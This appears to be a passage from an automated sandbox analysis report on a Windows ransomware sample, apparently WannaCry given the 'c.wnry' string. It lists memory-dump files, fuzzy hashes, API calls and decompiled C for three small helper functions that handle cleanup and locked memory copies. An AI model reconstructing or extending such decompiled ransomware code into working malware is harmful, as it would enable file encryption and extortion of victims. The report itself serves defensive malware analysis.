            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: AttributesFilestrcmp
            • String ID: c.wnry
            • API String ID: 3324900478-3240288721
            • Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
            • Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
            • Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
            • Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 84%
            			E00405C9F(signed int __eax, intOrPtr _a4) {
            				intOrPtr _t9;
            
            				_t9 = _a4;
            				if(_t9 != 0) {
            					if( *((char*)(_t9 + 0x10)) != 0) {
            						CloseHandle( *(_t9 + 4));
            					}
            					_push(_t9);
            					L004076E8();
            					return 0;
            				} else {
            					return __eax | 0xffffffff;
            				}
            			}
            0x00405ca0
            0x00405ca6
            0x00405cb1
            0x00405cb6
            0x00405cb6
            0x00405cbc
            0x00405cbd
            0x00405cc6
            0x00405ca8
            0x00405cac
            0x00405cac

            APIs
            • CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
            • ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: ??3@CloseHandle
            • String ID: $l@
            • API String ID: 3816424416-2140230165
            • Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
            • Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
            • Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
            • Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 25%
            			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
            				void* _t13;
            				void* _t16;
            				struct _CRITICAL_SECTION* _t19;
            				void* _t20;
            
            				_t20 = __ecx;
            				if( *((intOrPtr*)(__ecx + 8)) == 0) {
            					L3:
            					return 0;
            				}
            				_t19 = __ecx + 0x10;
            				EnterCriticalSection(_t19);
            				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
            				_push(_t19);
            				if(_t13 != 0) {
            					LeaveCriticalSection();
            					memcpy(_a12, _a4, _a8);
            					 *_a16 = _a8;
            					_t16 = 1;
            					return _t16;
            				}
            				LeaveCriticalSection();
            				goto L3;
            			}
            0x004019e5
            0x004019ec
            0x00401a19
            0x00000000
            0x00401a19
            0x004019ee
            0x004019f2
            0x00401a08
            0x00401a10
            0x00401a11
            0x00401a1d
            0x00401a2c
            0x00401a3a
            0x00401a3e
            0x00000000
            0x00401a3e
            0x00401a13
            0x00000000

            APIs
            • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
            • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
            • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
            • memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: CriticalSection$Leave$Entermemcpy
            • String ID:
            • API String ID: 3435569088-0
            • Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
            • Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
            • Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
            • Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
            Uniqueness

            Uniqueness Score: -1.00%